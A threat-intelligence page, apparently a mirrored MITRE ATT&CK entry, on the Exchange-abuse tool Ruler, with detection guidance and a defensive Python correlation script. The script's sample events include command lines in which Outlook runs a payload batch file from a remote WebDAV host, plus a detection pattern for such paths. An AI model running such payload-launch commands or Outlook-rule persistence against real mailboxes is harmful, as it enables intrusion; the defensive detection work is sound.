S0358: Ruler
Analyst context for executives and security teams
Ruler matters because it targets Microsoft Exchange and Outlook-related services that many organizations treat as trusted business infrastructure. Even without ATT&CK-provided detection guidance, the relationships show decision-relevant risk: the tool is associated with email account discovery and Outlook-based persistence methods. For leaders, this is an email-platform resilience issue, not just an endpoint tooling issue.
Executive priority
Prioritize validation around Exchange and Office Suite visibility where email compromise would disrupt operations, executive communications, investigations, or compliance evidence. Security leaders should ask whether the SOC can see suspicious command-line use against Exchange services, mailbox rule/form/home page changes, and email account enumeration activity. The APT33 relationship raises threat-intelligence relevance, but local exposure and control priority should be based on whether the organization operates Microsoft Exchange/Outlook environments and collects the necessary telemetry.
Technical view
Ruler is a publicly available command-line tool for abusing Microsoft Exchange services; ATT&CK lists Windows and Office Suite as its platforms. ATT&CK links it to Email Account discovery and to Outlook persistence techniques involving Outlook Forms, Outlook Home Page, and Outlook Rules. SOC and IR teams should validate coverage for Exchange service interactions, Outlook mailbox configuration changes, and endpoint command execution that could indicate unauthorized tooling. Because the official object provides no detection text, detections should be built and tested against the related techniques rather than assuming that matching on the tool's name is sufficient.
Likely telemetry
- Windows process creation and command-line telemetry
- Exchange server and Exchange service access logs
- Mailbox audit logs for Outlook rule, form, and home page changes
- Office/Outlook client activity where available
- Authentication logs tied to Exchange or mailbox access
Detection direction
- Validate whether Exchange and mailbox audit logging captures changes associated with Outlook Rules, Outlook Forms, and Outlook Home Page persistence.
- Correlate command-line execution on Windows systems with Exchange or mailbox access events rather than relying only on process names or public tool indicators.
- Review account discovery patterns involving email address lists or mailbox enumeration, especially when followed by Outlook persistence changes.
- Tune for legitimate administrative mailbox management to reduce false positives; Exchange administrators and help desk workflows may create benign mailbox rules or configuration changes.
- Assess whether NotRuler or similar defensive checks are appropriate for environment-specific validation, since ATT&CK notes its existence but does not provide guaranteed detection logic.
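The correlation described in the bullets above, worked through as an added example: the code is not from SensePost, MITRE or Glexia, and the field names, the trusted network ranges, the audit operation set and every sample event are constructed for illustration and have to be mapped onto your own Exchange mailbox-audit and process-creation telemetry. It joins two signals on user and time: an inbox-rule change recorded from an address outside the networks you consider normal, and outlook.exe on the victim endpoint spawning a child that references a UNC or WebDAV path (a rule created by a Ruler-style tool launches its payload from such a path when Outlook evaluates the rule). Either signal alone is reported at lower severity; the pair within the window is reported as high.

```python
"""
Correlate suspicious inbox-rule changes with Outlook child processes.

Added example; not code from SensePost, MITRE or Glexia. Field names, the
trusted network ranges and all sample events are constructed for illustration
and must be mapped onto your own Exchange mailbox-audit and process-creation
telemetry before use.
"""
from __future__ import annotations

import ipaddress
import re
from dataclasses import dataclass, field
from datetime import datetime, timedelta

# Mailbox-audit operations that create or modify inbox rules. UpdateInboxRules is
# what a MAPI client (Outlook, or a tool speaking MAPI) produces; New-/Set-InboxRule
# come from PowerShell and OWA. Extend for your platform.
RULE_OPERATIONS = {"UpdateInboxRules", "New-InboxRule", "Set-InboxRule"}

# Networks from which rule edits are expected (ASSUMPTION: replace with your own).
TRUSTED_NETWORKS = [ipaddress.ip_network("10.0.0.0/8"),
                    ipaddress.ip_network("192.168.0.0/16")]

# A Ruler-style rule launches its payload from a UNC or WebDAV path, so the
# endpoint-side signal is outlook.exe spawning a child that references one.
REMOTE_PATH = re.compile(r"(\\\\[\w.-]+\\|https?://)", re.I)

# How long after a rule change a triggered payload launch is still correlated.
CORRELATION_WINDOW = timedelta(hours=24)


@dataclass(frozen=True)
class MailboxEvent:
    time: datetime
    mailbox: str       # UPN of the mailbox owner
    operation: str     # e.g. "UpdateInboxRules"
    client_ip: str     # source address recorded by Exchange


@dataclass(frozen=True)
class ProcessEvent:
    time: datetime
    host: str
    user: str          # UPN of the logged-on user
    parent_image: str
    image: str
    command_line: str


@dataclass
class Finding:
    severity: str      # "low", "medium" or "high"
    user: str
    reason: str
    evidence: list = field(default_factory=list)


def untrusted_rule_changes(events: list[MailboxEvent]) -> list[MailboxEvent]:
    """Rule changes from outside the trusted networks. Weak alone; used for correlation."""
    return [e for e in events
            if e.operation in RULE_OPERATIONS
            and not any(ipaddress.ip_address(e.client_ip) in n for n in TRUSTED_NETWORKS)]


def outlook_remote_children(events: list[ProcessEvent]) -> list[ProcessEvent]:
    """outlook.exe launching a child whose image or command line points at a UNC/WebDAV path."""
    return [p for p in events
            if p.parent_image.lower().endswith("\\outlook.exe")
            and (REMOTE_PATH.search(p.image) or REMOTE_PATH.search(p.command_line))]


def correlate(mailbox_events, process_events, window=CORRELATION_WINDOW) -> list[Finding]:
    """Join both signals on user and time; unmatched signals are reported at lower severity."""
    findings: list[Finding] = []
    children = outlook_remote_children(process_events)
    matched: set[ProcessEvent] = set()
    for m in untrusted_rule_changes(mailbox_events):
        hits = [p for p in children
                if p.user.lower() == m.mailbox.lower() and m.time <= p.time <= m.time + window]
        if hits:
            matched.update(hits)
            findings.append(Finding("high", m.mailbox,
                                    "rule changed from untrusted network, then Outlook "
                                    "launched a remote payload", [m, *hits]))
        else:
            findings.append(Finding("low", m.mailbox, "rule changed from untrusted network", [m]))
    for p in children:
        if p not in matched:
            findings.append(Finding("medium", p.user,
                                    "Outlook spawned a child from a UNC/WebDAV path", [p]))
    return findings


def run_demo() -> list[Finding]:
    """Constructed events: a full chain (alice), a benign edit (bob), an endpoint-only hit (carol)."""
    t0 = datetime(2024, 5, 2, 9, 0)
    mailbox = [
        MailboxEvent(t0, "alice@example.com", "UpdateInboxRules", "203.0.113.7"),
        MailboxEvent(t0 + timedelta(minutes=30), "bob@example.com", "New-InboxRule", "10.1.2.3"),
    ]
    outlook = r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"
    procs = [
        ProcessEvent(t0 + timedelta(minutes=5), "WS01", "alice@example.com", outlook,
                     r"C:\Windows\System32\cmd.exe", r"cmd.exe /c \\203.0.113.7\webdav\payload.bat"),
        ProcessEvent(t0 + timedelta(minutes=40), "WS02", "bob@example.com", outlook,
                     r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "WINWORD.EXE /n"),
        ProcessEvent(t0 + timedelta(hours=3), "WS03", "carol@example.com", outlook,
                     r"C:\Windows\System32\cmd.exe", r"cmd.exe /c \\198.51.100.9\share\run.bat"),
    ]
    return correlate(mailbox, procs)


if __name__ == "__main__":
    for f in run_demo():
        print(f.severity.upper(), f.user, f.reason)
```

The network allowlist is deliberately the weaker half of the pair: a tool speaking MAPI/HTTP can present whatever client string and source address the attacker controls, which is why the endpoint signal (Outlook as parent of a process launched from a remote path) carries the correlation rather than any tool-specific indicator. Tune the trusted networks and the operation set against your own baseline before deploying anything like this.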
Mitigation priorities
- Confirm whether Microsoft Exchange and Outlook features in use are covered by mailbox auditing and centralized log retention.
- Restrict and monitor administrative access to Exchange and mailbox configuration capabilities using least privilege.
- Harden identity controls for mailbox access, including review of privileged and high-risk accounts.
- Establish IR playbooks for suspicious mailbox rule, form, or home page persistence, including evidence preservation and account review.
- Use the related ATT&CK techniques to drive control testing and compliance evidence for email-platform monitoring.
Analyst notes and limits
The most useful defensive framing comes from the relationships: Ruler uses Email Account discovery and Outlook persistence techniques. The supplied relationship to APT33 should be treated as threat-intelligence context only; it does not prove current activity or exposure in any environment. The public GitHub and NotRuler references support awareness that both offensive and defensive tooling exist, but local validation is still required.
ATT&CK provides no official detection text and no object-level tactics for Ruler. The supplied data does not justify claims about active exploitation, specific campaigns, guaranteed detections, or customer exposure. Recommendations must be adapted to the organization’s actual Exchange/Office deployment, logging configuration, and administrative workflows.
Ruler
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1137.005 | Office Application Startup: Outlook Rules | Ruler can be used to automate the abuse of Outlook Rules to establish persistence. [1] |
| Enterprise | T1137.003 | Office Application Startup: Outlook Forms | Ruler can be used to automate the abuse of Outlook Forms to establish persistence. [1] |
| Enterprise | T1137.004 | Office Application Startup: Outlook Home Page | Ruler can be used to automate the abuse of Outlook Home Pages to establish persistence. [1] |
| Enterprise | T1087.003 | Account Discovery: Email Account | Ruler can be used to enumerate Exchange users and dump the GAL. [1] |
Groups, software, and campaigns
G0064: APT33
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, the table compares the same object across releases by object hash and MITRE modification timestamp. For MITRE's own release notes and roadmap, see ATT&CK resources: Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.1 | | Current bundle | bfb0b85e1472… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] SensePost Ruler GitHub. SensePost. (2016, August 18). Ruler: A tool to abuse Exchange services. Retrieved February 4, 2019.
- [2] SensePost NotRuler. SensePost. (2017, September 21). NotRuler - The opposite of Ruler, provides blue teams with the ability to detect Ruler usage against Exchange. Retrieved February 4, 2019.
- [3] MITRE ATT&CK. S0358: Ruler (mirrored source object).
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.